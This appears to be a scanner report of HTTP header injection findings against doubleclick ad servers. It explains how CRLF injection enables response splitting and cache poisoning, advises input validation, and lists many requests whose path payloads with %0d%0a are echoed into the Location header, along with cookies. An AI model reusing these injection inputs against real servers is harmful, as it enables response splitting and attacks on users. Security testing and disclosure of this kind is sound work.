HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 80f99%0d%0a3233080be7b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /80f99%0d%0a3233080be7b/N3867.270604.B3/B5128597.21 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/80f99 3233080be7b/N3867.270604.B3/B5128597.21: Date: Mon, 31 Jan 2011 20:55:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 99f4d%0d%0a0c367cb23dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /99f4d%0d%0a0c367cb23dd/N3867.270604.B3/B5128597.22 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/99f4d 0c367cb23dd/N3867.270604.B3/B5128597.22: Date: Mon, 31 Jan 2011 20:55:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9faa1%0d%0aefed9909386 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9faa1%0d%0aefed9909386/N5047.adwords.google.com/B4529920.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9faa1 efed9909386/N5047.adwords.google.com/B4529920.11: Date: Mon, 31 Jan 2011 20:55:12 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 62f23%0d%0a6d1a95e2035 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62f23%0d%0a6d1a95e2035/N6595.152847.MICROSOFTADVERTISIN/B5143939.5 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62f23 6d1a95e2035/N6595.152847.MICROSOFTADVERTISIN/B5143939.5: Date: Mon, 31 Jan 2011 20:55:11 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 19750%0d%0ab128aae42a8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /19750%0d%0ab128aae42a8/N3867.270604.B3/B5128597.21;sz=300x250;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a/L47/1369993868/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/300/L36/1768404287/x90/USNetwork/RS_SELL_2011Q1_247_RTG_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1768404287? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 961da%0d%0aabc3683c089 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /961da%0d%0aabc3683c089/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1463634489/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/990402400/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=990402400? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 858bf%0d%0a37db744a3de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /858bf%0d%0a37db744a3de/N3867.270604.B3/B5128597.21;abr=!ie4;abr=!ie5;sz=300x250;ord=1768404287? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/858bf 37db744a3de/N3867.270604.B3/B5128597.21%3Babr%3D%21ie4%3Babr%3D%21ie5%3Bsz%3D300x250%3Bord%3D1768404287: Date: Mon, 31 Jan 2011 17:19:15 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 4cc21%0d%0ae59b3fe43dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4cc21%0d%0ae59b3fe43dc/sco.main/scuk HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4cc21 e59b3fe43dc/sco.main/scuk: Date: Mon, 31 Jan 2011 20:55:18 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 62193%0d%0a622c4571f51 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62193%0d%0a622c4571f51/sco.main/scuk.news HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62193 622c4571f51/sco.main/scuk.news: Date: Mon, 31 Jan 2011 20:55:17 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2d957%0d%0ae95b0723d73 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2d957%0d%0ae95b0723d73/sco.main/scuk HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2d957 e95b0723d73/sco.main/scuk: Date: Mon, 31 Jan 2011 17:19:15 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 96028%0d%0a6d1a7674818 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /96028%0d%0a6d1a7674818/sco.main/scuk.news HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/96028 6d1a7674818/sco.main/scuk.news: Date: Mon, 31 Jan 2011 17:19:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 54e7c%0d%0aa9f706b94c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /54e7c%0d%0aa9f706b94c9/sco.main/scuk HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/54e7c a9f706b94c9/sco.main/scuk: Date: Mon, 31 Jan 2011 20:55:18 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 66bc5%0d%0aafed60a501b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /66bc5%0d%0aafed60a501b/sco.main/scuk.news;log=0;spr=0;aid=195310;atype=news;cc=;pos=101;tile=1;sz=728x90;ord=123456789? HTTP/1.1 Host: ad.uk.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/66bc5 afed60a501b/sco.main/scuk.news%3Blog%3D0%3Bspr%3D0%3Baid%3D195310%3Batype%3Dnews%3Bcc%3D%3Bpos%3D101%3Btile%3D1%3Bsz%3D728x90%3Bord%3D123456789: Date: Mon, 31 Jan 2011 17:19:26 GMT Server: GFE/2.0 Connection: close